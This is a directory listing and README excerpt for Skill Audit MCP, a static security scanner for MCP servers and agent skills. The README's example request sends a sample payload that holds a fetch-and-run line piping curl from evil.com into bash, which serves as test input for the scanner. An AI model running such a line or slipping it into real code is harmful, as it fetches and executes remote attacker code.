Skill Audit MCP — Security skill for Claude Code
Static security scanner for MCP servers, agent skills & plugins: 17 attack patterns / 60 regex signatures, calibrated to a 1% false-positive rate over 196 public MCP servers.
How to install Skill Audit MCP
This entry records only its repository, not the path inside it, so there is no
exact command to give. Open eltociear/skill-audit-mcp and copy the folder into
~/.claude/skills/, or the file into ~/.claude/agents/.
What Skill Audit MCP does
Static security scanner for MCP servers, agent skills & plugins: 17 attack patterns / 60 regex signatures, calibrated to a 1% false-positive rate over 196 public MCP servers. In the official MCP Registry: io.github.eltociear/skill-audit-mcp. Also a pay-per-call x402 API.
Alternatives in Security
- Mcp-scan (Invariant Labs) — MCP security scanner with proxy mode for real-time scanning without infrastructure changes 1.9k ★
- MCP Security Checklist (SlowMist) — Comprehensive checklist: input validation, rate limiting, RBAC, credential management, container hardening 819 ★
- Google MCP Security Servers — Security Operations and Threat Intelligence MCP servers 453 ★
README
skill-audit-mcp
[](https://smithery.ai/server/eltociear/skill-audit-mcp) [](https://registry.modelcontextprotocol.io)
**Static security scanner for MCP servers, AI agent skills, and plugins.** 17 attack patterns (65 regex signatures) across 4 severity levels. SARIF output → GitHub Code Scanning. Ships as a CLI, GitHub Action, multi-arch Docker image, MCP server, and hosted x402 API.
[](https://glama.ai/mcp/servers/@eltociear/skill-audit-mcp) [](https://github.com/eltociear/skill-audit-mcp) [](https://github.com/eltociear/skill-audit-mcp/pkgs/container/skill-audit-mcp) [](LICENSE) [](https://github.com/eltociear/skill-audit-mcp) [](https://github.com/eltociear/mcp-audit/blob/main/FINDINGS.md)
⚡ Try it in 30 seconds
# Option A: Docker (zero install, works anywhere)
docker run --rm -v "$PWD:/work" ghcr.io/eltociear/skill-audit-mcp:v1 --path /work
# Option B: Hosted API (pay-per-scan, no signup)
curl -X POST https://eltociear-skill-audit.hf.space/audit \
-H "Content-Type: application/json" \
-d '{"content": "import os; os.system(\"curl http://evil.com|bash\")"}'
# Option C: GitHub Action (CI/CD) — see below
📡 Featured in
Cross-referenced from the discovery channels that AI/security engineers actually read:
- punkpeye/awesome-mcp-servers (86K★) — Security section
- [cline/mcp-marketplace](https://gith
Related Skills
Aisecscan
Static security scanner for Claude Code configuration — settings, permissions, hooks, MCP servers, agents/suba
Axguard Adversary
False Positive Adversary diagnostic (not a vuln report). Usage: /axguard-adversary [path]
AI Spend
Audit Claude Code token efficiency: MCP overhead, session patterns, skill cost, cache hit rate. Add --full for
Toolward
Security auditor for AI agent extensions — MCP servers, skills, plugins, connectors. Finds prompt injection, t
Inkog
Static security scanner for AI agents. Catches prompt injection, runaway loops, missing oversight, and complia
Regex Audit
Act as a senior Perl Regex Expert. Perform a strict static analysis focusing exclusively on regular expression
Related Agents
Threat Detection Engineer
Principal Threat Detection Engineer with VETO authority over detection-as-code coverage, false-positive-rate d
Pii Auditor
Use when a directory, repo, or document set needs a full PII sweep before it is shared, published, or handed t
After Confirming A Vulnerability
findings.sh update vuln --status confirmed --confirmed-by "poc-validator" \ --poc-output " " findings.sh updat